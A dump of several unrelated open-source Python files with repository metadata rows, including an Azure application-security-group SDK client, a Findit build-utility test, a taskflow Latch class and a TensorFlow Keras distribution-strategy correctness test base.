'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ApplicationSecurityGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.ApplicationSecurityGroup"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Creates or updates an application security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to the create or update ApplicationSecurityGroup
operation.
:type parameters: ~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.ApplicationSecurityGroup"
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationSecurityGroupName': self._serialize.url("application_security_group_name", application_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
application_security_group_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Updates an application security group's tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_security_group_name: The name of the application security group.
:type application_security_group_name: str
:param parameters: Parameters supplied to update application security group tags.
:type parameters: ~azure.mgmt.network.v2019_02_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
application_security_group_name=application_security_group_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
"""Gets all application security groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
"""Gets all the application security groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
| [
"[email protected]"
]
| |
17a937aeee7d4803c81b66038606d007a43ba375 | 01c3ff1d74e754e0d4ce0fb7f8a8b329ec3766e1 | /python_exercises/19others/pattern5.py | 483e78e63f8ebcaf6ba87bcd805f663dff7c4353 | []
| no_license | vineel2014/Pythonfiles | 5ad0a2b824b5fd18289d21aa8306099aea22c202 | 0d653cb9659fe750cf676a70035ab67176179905 | refs/heads/master | 2020-04-28T03:56:22.713558 | 2019-03-11T08:38:54 | 2019-03-11T08:38:54 | 123,681,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | def printTri(n):
for i in range(1,n+1):
print(' '.join(str(i)*i))
n=int(input("enter range to display number triangle"))
printTri(n)
| [
"[email protected]"
]
| |
01eab334f8dd405e5b1de91172d26a98b76d39ee | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/findit/findit_v2/services/test/build_util_test.py | 85dd03198119d71eff746fb8c2caeb9a58e5112b | [
"BSD-3-Clause"
]
| permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 1,905 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.build_pb2 import BuilderID
from buildbucket_proto.step_pb2 import Step
from findit_v2.services import build_util
from findit_v2.services.context import Context
from findit_v2.services.failure_type import StepTypeEnum
class BuildUtilTest(unittest.TestCase):
def testGetFailedStepsInBuild(self):
build_id = 8000000000123
build_number = 123
builder = BuilderID(project='chromium', bucket='try', builder='linux-rel')
build = Build(
id=build_id,
builder=builder,
number=build_number,
status=common_pb2.FAILURE)
step1 = Step(name='s1', status=common_pb2.SUCCESS)
step2 = Step(name='compile', status=common_pb2.FAILURE)
build.steps.extend([step1, step2])
context = Context(
luci_project_name='chromium',
gitiles_host='gitiles.host.com',
gitiles_project='project/name',
gitiles_ref='ref/heads/master',
gitiles_id='git_sha')
failed_steps = build_util.GetFailedStepsInBuild(context, build)
self.assertEqual(1, len(failed_steps))
self.assertEqual('compile', failed_steps[0][0].name)
self.assertEqual(StepTypeEnum.COMPILE, failed_steps[0][1])
def testGetAnalyzedBuildIdFromRerunBuild(self):
analyzed_build_id = 8000000000123
build = Build(tags=[{
'key': 'analyzed_build_id',
'value': str(analyzed_build_id)
}])
self.assertEqual(analyzed_build_id,
build_util.GetAnalyzedBuildIdFromRerunBuild(build))
def testGetAnalyzedBuildIdFromRerunBuildNoAnalyzedBuildId(self):
self.assertIsNone(build_util.GetAnalyzedBuildIdFromRerunBuild(Build()))
| [
"[email protected]"
]
| |
c3ff78ade7a48d81ea1bf2007c51af01e08bfb47 | 92e3a6424326bf0b83e4823c3abc2c9d1190cf5e | /scripts/icehouse/opt/stack/taskflow/taskflow/types/latch.py | 0945a286cd816a0b0bdfd456401608455ecb04dd | [
"Apache-2.0"
]
| permissive | AnthonyEzeigbo/OpenStackInAction | d6c21cf972ce2b1f58a93a29973534ded965d1ea | ff28cc4ee3c1a8d3bbe477d9d6104d2c6e71bf2e | refs/heads/master | 2023-07-28T05:38:06.120723 | 2020-07-25T15:19:21 | 2020-07-25T15:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from taskflow.types import timing as tt
class Latch(object):
"""A class that ensures N-arrivals occur before unblocking.
TODO(harlowja): replace with http://bugs.python.org/issue8777 when we no
longer have to support python 2.6 or 2.7 and we can only support 3.2 or
later.
"""
def __init__(self, count):
count = int(count)
if count <= 0:
raise ValueError("Count must be greater than zero")
self._count = count
self._cond = threading.Condition()
@property
def needed(self):
"""Returns how many decrements are needed before latch is released."""
return max(0, self._count)
def countdown(self):
"""Decrements the internal counter due to an arrival."""
self._cond.acquire()
try:
self._count -= 1
if self._count <= 0:
self._cond.notify_all()
finally:
self._cond.release()
def wait(self, timeout=None):
"""Waits until the latch is released.
NOTE(harlowja): if a timeout is provided this function will wait
until that timeout expires, if the latch has been released before the
timeout expires then this will return True, otherwise it will
return False.
"""
w = None
if timeout is not None:
w = tt.StopWatch(timeout).start()
self._cond.acquire()
try:
while self._count > 0:
if w is not None:
if w.expired():
return False
else:
timeout = w.leftover()
self._cond.wait(timeout)
return True
finally:
self._cond.release()
| [
"[email protected]"
]
| |
27e9ed8c37a43ac6f6365ba000efcb25594e79f7 | e5e0d729f082999a9bec142611365b00f7bfc684 | /tensorflow/python/keras/distribute/keras_correctness_test_base.py | 73b899ba3cc9bc01310730fc690ff2d3340a15b0 | [
"Apache-2.0"
]
| permissive | NVIDIA/tensorflow | ed6294098c7354dfc9f09631fc5ae22dbc278138 | 7cbba04a2ee16d21309eefad5be6585183a2d5a9 | refs/heads/r1.15.5+nv23.03 | 2023-08-16T22:25:18.037979 | 2023-08-03T22:09:23 | 2023-08-03T22:09:23 | 263,748,045 | 763 | 117 | Apache-2.0 | 2023-07-03T15:45:19 | 2020-05-13T21:34:32 | C++ | UTF-8 | Python | false | false | 22,395 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Correctness tests for tf.keras using DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl.testing import parameterized
import numpy as np
import six
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import tpu_strategy
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import random_seed
from tensorflow.python.keras.distribute import distributed_training_utils
from tensorflow.python.util import nest
_RANDOM_SEED = 1337
_EVAL_STEPS = 20
_GLOBAL_BATCH_SIZE = 64
# Note: Please make sure the tests in this file are also covered in
# keras_backward_compat_test for features that are supported with both APIs.
all_strategies = [
strategy_combinations.default_strategy,
strategy_combinations.one_device_strategy,
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
strategy_combinations.mirrored_strategy_with_two_gpus,
strategy_combinations.tpu_strategy, # steps_per_run=2
strategy_combinations.tpu_strategy_one_step,
]
def eager_mode_test_configuration():
return combinations.combine(
mode='eager', use_numpy=[True, False], use_validation_data=[True, False])
def graph_mode_test_configuration():
return combinations.combine(
mode='graph', use_numpy=[True, False], use_validation_data=[True, False])
def all_strategy_and_input_config_combinations():
return (combinations.times(
combinations.combine(
distribution=all_strategies,
experimental_run_tf_function=[True, False]),
eager_mode_test_configuration() + graph_mode_test_configuration()))
def strategy_minus_tpu_and_input_config_combinations_eager():
return (combinations.times(
combinations.combine(
distribution=strategy_combinations.strategies_minus_tpu),
eager_mode_test_configuration()))
def strategies_for_embedding_models():
"""Returns distribution strategies to test for embedding models.
Since embedding models take longer to train, we disregard DefaultStrategy
in order to prevent testing timeouts.
"""
return [
s for s in all_strategies if s.required_tpu or s.required_gpus or
s is strategy_combinations.one_device_strategy
]
def test_combinations_for_embedding_model():
# TODO(sourabhbajaj): Enable tests for eager mode
eager_mode_strategies = [
s for s in strategies_for_embedding_models() if not s.required_tpu
]
return (combinations.times(
combinations.combine(
distribution=strategies_for_embedding_models(),
experimental_run_tf_function=[True, False]),
(graph_mode_test_configuration())) + combinations.times(
combinations.combine(
distribution=eager_mode_strategies,
experimental_run_tf_function=[False]),
(eager_mode_test_configuration())))
def test_combinations_with_tpu_strategies():
tpu_strategies = [
strategy_combinations.tpu_strategy,
strategy_combinations.tpu_strategy_one_step
]
return (combinations.times(
combinations.combine(distribution=tpu_strategies),
graph_mode_test_configuration()))
class MaybeDistributionScope(object):
"""Provides a context allowing no distribution strategy."""
def __init__(self, distribution):
self._distribution = distribution
self._scope = None
def __enter__(self):
if self._distribution:
self._scope = self._distribution.scope()
self._scope.__enter__()
def __exit__(self, exc_type, value, traceback):
if self._distribution:
self._scope.__exit__(exc_type, value, traceback)
self._scope = None
def batch_wrapper(dataset, batch_size, repeat=None):
if repeat:
dataset = dataset.repeat(repeat)
return dataset.batch(batch_size)
def get_batch_size(global_batch_size, distribution):
batch_size = global_batch_size
# TODO(b/118776054): Use global batch size for Keras/DS support.
use_per_core_batch_size = (
distribution and
not distributed_training_utils.global_batch_size_supported(distribution))
if use_per_core_batch_size:
batch_size //= distribution.num_replicas_in_sync
return batch_size
def get_data_size(data):
"""Gets the size of data in list, tuple, dict, or a numpy array."""
assert isinstance(data, (np.ndarray, list, dict, tuple))
if isinstance(data, np.ndarray):
return len(data)
if isinstance(data, (list, tuple)):
return len(data[0])
return len(six.next(six.itervalues(data)))
def get_shapes(data):
shapes = None
if all(hasattr(x, 'shape') for x in nest.flatten(data)):
shapes = nest.map_structure(lambda x: x.shape, data)
return shapes
def get_correctness_test_inputs(use_numpy, use_validation_data,
with_distribution, x_train, y_train, x_eval,
y_eval, x_predict, training_epochs):
"""Generates the inputs for correctness check when enable Keras with DS."""
global_batch_size = _GLOBAL_BATCH_SIZE
batch_size = get_batch_size(global_batch_size, with_distribution)
if use_numpy:
training_inputs = {
'batch_size': batch_size,
'x': x_train,
'y': y_train,
'epochs': training_epochs,
'shuffle': False,
}
if use_validation_data:
eval_inputs = None
training_inputs['validation_data'] = (x_eval, y_eval)
else:
eval_inputs = {
'batch_size': batch_size,
'x': x_eval,
'y': y_eval,
}
predict_inputs = {'x': x_predict}
else:
training_data_size = get_data_size(x_train)
# For dataset inputs, we do not pass batch_size to
# keras.fit/evaluate/predict. The batch size is part of the dataset.
train_dataset = dataset_ops.Dataset.from_tensor_slices((x_train, y_train))
x = batch_wrapper(train_dataset, batch_size, repeat=training_epochs)
steps_per_epoch = int(np.ceil(1.0 * training_data_size / global_batch_size))
training_inputs = {
'batch_size': None,
'x': x,
'y': None,
'epochs': training_epochs,
'shuffle': False,
'steps_per_epoch': steps_per_epoch
}
if use_validation_data:
eval_inputs = None # Remove the eval_inputs
eval_dataset = dataset_ops.Dataset.from_tensor_slices((x_eval, y_eval))
x = batch_wrapper(eval_dataset, batch_size)
training_inputs['validation_data'] = x
training_inputs['validation_steps'] = 5
else:
eval_dataset = dataset_ops.Dataset.from_tensor_slices((x_eval, y_eval))
x = batch_wrapper(eval_dataset, batch_size)
eval_steps = int(np.ceil(1.0 * get_data_size(x_eval) / global_batch_size))
eval_inputs = {
'batch_size': None,
'x': x,
'y': None,
'steps': eval_steps,
}
predict_batch_size = get_batch_size(
get_data_size(x_predict), with_distribution)
predict_dataset = dataset_ops.Dataset.from_tensor_slices(x_predict)
predict_dataset = batch_wrapper(predict_dataset, predict_batch_size)
predict_inputs = {
'steps': 1,
'x': predict_dataset,
}
return training_inputs, eval_inputs, predict_inputs
def fit_eval_and_predict(initial_weights,
input_fn,
model_fn,
experimental_run_tf_function=None,
distribution=None,
is_stateful_model=False):
"""Generates results for fit/predict/evaluate for given model."""
training_inputs, eval_inputs, predict_inputs = input_fn()
model = model_fn(
experimental_run_tf_function=experimental_run_tf_function,
initial_weights=initial_weights,
distribution=distribution,
input_shapes=get_shapes(training_inputs['x']))
result = {}
result['training_history_1'] = model.fit(**training_inputs).history
if eval_inputs is not None:
result['eval_result_1'] = model.evaluate(**eval_inputs)
result['weights_1'] = model.get_weights()
if predict_inputs is not None:
# Check correctness of the result of predict() invoked
# multiple times -- as for stateful models, result of
# predict may differ for each batch.
predict_length = 1
if is_stateful_model:
predict_length = 3
for i in range(predict_length):
result_key = 'predict_result_{}'.format(i)
result[result_key] = model.predict(**predict_inputs)
# Train and eval again to mimic user's flow.
result['training_history_2'] = model.fit(**training_inputs).history
if eval_inputs is not None:
result['eval_result_2'] = model.evaluate(**eval_inputs)
result['weights_2'] = model.get_weights()
return result
def compare_results(results_with_ds,
results_without_ds,
distribution,
testcase,
partial_last_batch=None):
"""Compares results of model compiled with/without distribution strategy."""
if partial_last_batch == 'train_and_eval':
# We relax the tolerence a lot in the partial last batch case as
# 1. the examples in uneven batches may have different weights when
# applying the gradients in the distributed case.
# 2. TF Keras and TF Keras DS have different ways to handle the case when
# training with epochs > 1 with numpy inputs. In TF Keras, every epoch
# may have a partial batch. While in TF Keras DS, as we convert
# numpy inputs into dataset, it will do a repeat() first and calculate
# steps_per_epoch, so it will at most have one partial batch. This
# makes the 1-CPU result even different.
default_tolerance = 1e-3
relaxed_tolerance = 1e-3
else:
default_tolerance = 1e-5
relaxed_tolerance = 1e-4
def _get_compare_result_tolerance(key):
"""Returns tolerance to compare results."""
# TODO(b/119257215): For MirroredStrategy, weights are not exactly the same,
# so use larger tolerance for now. Predict should be related to weights.
if (isinstance(distribution,
(mirrored_strategy.MirroredStrategy,
distribute_lib._DefaultDistributionStrategy)) and # pylint: disable=protected-access
key.startswith(('weights_1', 'weights_2', 'predict_result'))):
return relaxed_tolerance
return default_tolerance
for key in sorted(results_with_ds.keys()):
if (key.startswith('training_history') and
isinstance(distribution,
(tpu_strategy.TPUStrategy, tpu_strategy.TPUStrategyV1)) and
distribution.extended.steps_per_run > 1):
# TODO(b/119894254): Enable this test for all cases once the
# underlying bug is fixed.
continue
tolerance = _get_compare_result_tolerance(key)
# We don't compare the loss as loss is currently not computed as metric
# in Keras, the loss value is inaccurate for last partial batch due to
# more weights for the last batch samples.
if partial_last_batch is not None:
if key.startswith('eval_result'):
results_with_ds[key] = results_with_ds[key][1:]
results_without_ds[key] = results_without_ds[key][1:]
if key.startswith('training_history'):
results_with_ds[key]['val_loss'] = 0
results_without_ds[key]['val_loss'] = 0
testcase.assertAllClose(
results_with_ds[key],
results_without_ds[key],
atol=tolerance,
rtol=tolerance,
msg='Fail to assert {}.'.format(key))
def should_skip_tpu_with_eager(distribution):
return (context.executing_eagerly() and
isinstance(distribution,
(tpu_strategy.TPUStrategy, tpu_strategy.TPUStrategyV1)))
class LearningRateBatchScheduler(keras.callbacks.Callback):
"""Scheduler that dynamically sets the learning rate of model."""
def __init__(self, update_freq=None):
self._update_freq = update_freq
def on_batch_begin(self, batch, logs=None):
if self._update_freq and batch % self._update_freq != 0:
return
# To avoid divergence, limit the value range.
lr = 0.001 * (batch % 10)
keras.backend.set_value(self.model.optimizer.lr, lr)
class TestDistributionStrategyCorrectnessBase(test.TestCase,
parameterized.TestCase):
"""Model agnostic testing infra to test correctness of Keras models."""
def set_up_test_config(self,
use_numpy=False,
use_validation_data=False,
with_batch_norm=False):
self.use_numpy = use_numpy
self.use_validation_data = use_validation_data
self.with_batch_norm = with_batch_norm
keras.backend.set_image_data_format('channels_last')
np.random.seed(_RANDOM_SEED)
random_seed.set_random_seed(_RANDOM_SEED)
def get_data(self):
num_samples = 10000
x_train = np.random.randint(0, 2, num_samples)
x_train = np.reshape(x_train, (num_samples, 1))
y_train = x_train
return (x_train.astype('float32'), y_train.astype('float32'), None)
def get_data_with_partial_last_batch(self):
raise NotImplementedError
def get_data_with_partial_last_batch_eval(self):
raise NotImplementedError
def get_input_for_correctness_test(self, **kwargs):
"""Generates inputs that are dictionaries.
We only provide a default implementation of this method here. If you need
more customized way of providing input to your model, overwrite this method.
Arguments:
**kwargs: key word arguments about how to create the input dictionaries
Returns:
Three dictionaries representing the input for fit(), evalutate() and
predict()
"""
return get_correctness_test_inputs(**kwargs)
def get_model(self,
distribution=None,
experimental_run_tf_function=None,
input_shapes=None):
